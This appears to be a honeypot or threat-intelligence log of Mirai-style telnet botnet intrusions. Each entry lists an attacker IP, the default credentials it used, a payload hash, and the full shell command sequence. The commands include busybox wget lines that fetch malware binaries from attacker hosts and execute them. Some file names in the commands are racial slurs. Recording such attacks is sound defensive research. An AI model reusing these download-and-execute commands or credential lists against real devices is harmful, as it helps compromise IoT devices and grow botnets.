| IP address |
User name |
Password |
SHA256 of the payload file |
 134.209.34.32
| support | 123456 | 092b516f5609b14980f3f754159e02b875458752528ef2430e56d676431df108 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf apep999 lolfok
/bin/busybox cp /bin/busybox apep999; >apep999; /bin/busybox chmod 777 apep999; /bin/busybox APEP
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox APEP
/bin/busybox wget; /bin/busybox tftp; /bin/busybox APEP
/bin/busybox wget http://134.209.34.32:80/bins/apep.sh4 -O - > apep999; /bin/busybox chmod 777 apep999; /bin/busybox APEP
./apep999 telnet; /bin/busybox APOPHIS
/bin/busybox rm -rf lolfok; >apep999; /bin/busybox APEP |
134.209.210.185 | support | 123456 | 405fbd27e8180a6b2dfc2ecdc12506e0d3fafd3645220369d08f14f3dcc41505 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf zoneniggr sosa
/bin/busybox cp /bin/busybox zoneniggr; >zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox RIFT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox RIFT
/bin/busybox wget http://134.209.210.185:80/bins/rift.sh4 -O - > zoneniggr; /bin/busybox chmod 777 zoneniggr; /bin/busybox RIFT
./zoneniggr telnet.sh4; /bin/busybox SIX
/bin/busybox rm -rf sosa; >zoneniggr; /bin/busybox RIFT |
134.209.71.79 | default | OxhlwSG8 | 9a2244203e6b969f83769cd662a46aaa164c70301a3584c196121e9c160adb8a |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://134.209.71.79:80/bins/sora.spc -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.spc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
159.203.70.140 | support | 123456 | 4ab50e6a37f812341d6250ca94680f08395b52adb3197a614dc2fe914e9a497b |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf u91jam19ak dropper
/bin/busybox cp /bin/busybox u91jam19ak; >u91jam19ak; /bin/busybox chmod 777 u91jam19ak; /bin/busybox ONRYO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox ONRYO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ONRYO
/bin/busybox wget http://159.203.70.140:80/bins/onryo.ppc -O - > u91jam19ak; /bin/busybox chmod 777 u91jam19ak; /bin/busybox ONRYO
./u91jam19ak telnet.loader.ppc; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >u91jam19ak; /bin/busybox ONRYO |
 185.244.25.164
| root | 7ujMko0admin | 1c9a78f07723a63b4d1238980b79a4f8e3e2fbf6698663e9b90d87fd7eb26b0d |
enable
shell
system
bah
start
linuxshell
sh
/bin/busybox DARK
/bin/busybox ps; /bin/busybox DARK
/bin/busybox cat /proc/mounts; /bin/busybox DARK
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox DARK
cd /
/bin/busybox cp /bin/echo darkexecbin; >darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
/bin/busybox cat /bin/echo
/bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://185.244.25.164:80/kohan.sh4 -O - > darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
./darkexecbin telnet.sh4.wget; /bin/busybox KRAD
/bin/busybox DARK |
185.244.25.164 | root | password | 2317adc546d1bff1a17f50f386aec9455c0c0ee23d5823f1384867faa58162aa |
enable
shell
system
bah
start
linuxshell
sh
/bin/busybox DARK
/bin/busybox ps; /bin/busybox DARK
/bin/busybox cat /proc/mounts; /bin/busybox DARK
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox DARK
cd /
/bin/busybox cp /bin/echo darkexecbin; >darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
/bin/busybox cat /bin/echo
/bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://185.244.25.164:80/kohan.spc -O - > darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
./darkexecbin telnet.spc.wget; /bin/busybox KRAD
/bin/busybox DARK |
 142.93.221.1
| admin | synnet | 438a94a47efce3ec4669e6a4bdaebd939877621333c78532a4f646604173f426 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf help halp
/bin/busybox cp /bin/busybox help; >help; /bin/busybox chmod 777 help; /bin/busybox HITO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HITO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HITO
/bin/busybox wget http://142.93.221.1:80/13747243572475/arm -O - > help; /bin/busybox chmod 777 help; /bin/busybox HITO
./help load.wget; /bin/busybox HIITO
/bin/busybox rm -rf halp help
/bin/busybox cp /bin/busybox help; >help; /bin/busybox chmod 777 help; /bin/busybox HITO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HITO
/bin/busybox wget http://142.93.221.1:80/13747243572475/arm7 -O - > help; /bin/busybox chmod 777 help; /bin/busybox HITO
./help load.wget; /bin/busybox HIITO
/bin/busybox rm -rf halp; >help; /bin/busybox HITO |
185.244.25.164 | root | 7ujMko0admin | de708fd8eb2b04b8d531518a1656cb25520ce7cc61f3f5f509039bf70dd6a450 |
enable
shell
system
bah
start
linuxshell
sh
/bin/busybox DARK
/bin/busybox ps; /bin/busybox DARK
/bin/busybox cat /proc/mounts; /bin/busybox DARK
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox DARK
cd /
/bin/busybox cp /bin/echo darkexecbin; >darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
/bin/busybox cat /bin/echo
/bin/busybox DARK
cat /proc/cpuinfo; /bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://185.244.25.164:80/kohan.arm -O - > darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
./darkexecbin telnet.arm.wget; /bin/busybox KRAD
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://185.244.25.164:80/kohan.arm7 -O - > darkexecbin; /bin/busybox chmod 777 darkexecbin; /bin/busybox DARK
./darkexecbin telnet.arm7.wget; /bin/busybox KRAD
/bin/busybox DARK |